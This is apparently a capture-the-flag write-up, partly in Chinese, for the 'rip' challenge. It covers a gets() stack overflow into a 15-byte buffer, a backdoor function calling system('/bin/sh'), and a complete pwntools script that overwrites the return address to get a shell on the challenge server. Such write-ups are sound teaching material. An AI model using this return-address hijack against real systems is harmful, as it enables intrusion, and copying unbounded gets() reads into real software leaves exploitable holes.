# rip
# 前提
# 查看文件保护
root@localhost ~# checksec pwn1
[*] '/root/pwn1'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x400000)
RWX: Has RWX segments
# 静态分析
/*
 * Decompiler output for the challenge binary's main().
 *
 * s is a 15-byte buffer placed at rbp-0xF. gets() performs no bounds check,
 * so any input longer than 15 bytes runs past s, over the 8-byte saved rbp,
 * and into the saved return address: 15 + 8 = 23 bytes, which is the offset
 * the writeup later confirms with cyclic. Nothing in the binary detects the
 * overwrite (checksec above: no stack canary, No PIE, NX disabled).
 * The fix on the program side would be a bounded read such as
 * fgets(s, sizeof s, stdin) instead of gets().
 */
int __cdecl main(int argc, const char **argv, const char **envp)
{
char s[15]; // [rsp+1h] [rbp-Fh] BYREF — fixed-size stack buffer; no input length limit is enforced
puts("please input");
gets(s, argv); // decompiler artifact: gets() takes only one argument; the unbounded read is the vulnerability
puts(s);
puts("ok,bye!!!");
return 0;
}
可以明显看到程序使用了不做长度检查的 gets 函数，存在栈溢出；另外本题存在后门函数 fun：
/*
 * Backdoor present in the binary. main() never calls it, but because the
 * binary is built with No PIE its address is fixed, so a return address
 * overwritten by the overflow in main() can be pointed here to obtain a shell.
 */
int fun()
{
return system("/bin/sh");
}
# 思路分析
本题没有开启 PIE，可以通过栈溢出将原函数的返回地址覆盖为后门函数的地址，从而劫持程序流获得 shell。
# 确定偏移量
使用 cyclic 简单测试一下即可得知本题偏移量为 23。
# exp
# pwntools script for the challenge above. Flow: connect to the target,
# send one line that overflows s[15] in main(), and hand the resulting
# shell over to the user.
from pwn import *
# arch='amd64' makes flat() pack the integer below as a 64-bit little-endian value;
# log_level='debug' prints every byte sent/received, useful when the offset is wrong.
context(os='linux', arch='amd64', log_level='debug')
pwnfile = '/root/pwn/buuctf/rip/pwn1'
io = remote('node4.buuoj.cn', 26919)  # remote instance; use the process() line below for local testing
# io = process(pwnfile)
elf = ELF(pwnfile)  # loaded but not used below; the backdoor address is hard-coded instead
padding: int = 23  # bytes from s (rbp-0xF) to the saved return address: 15 buffer + 8 saved rbp
backdoor: int = 0x40118A  # address of fun(); only usable as a constant because the binary has No PIE
payload = flat(['a'*padding, backdoor])  # filler up to the return address, then the new return address
io.sendline(payload)
io.interactive()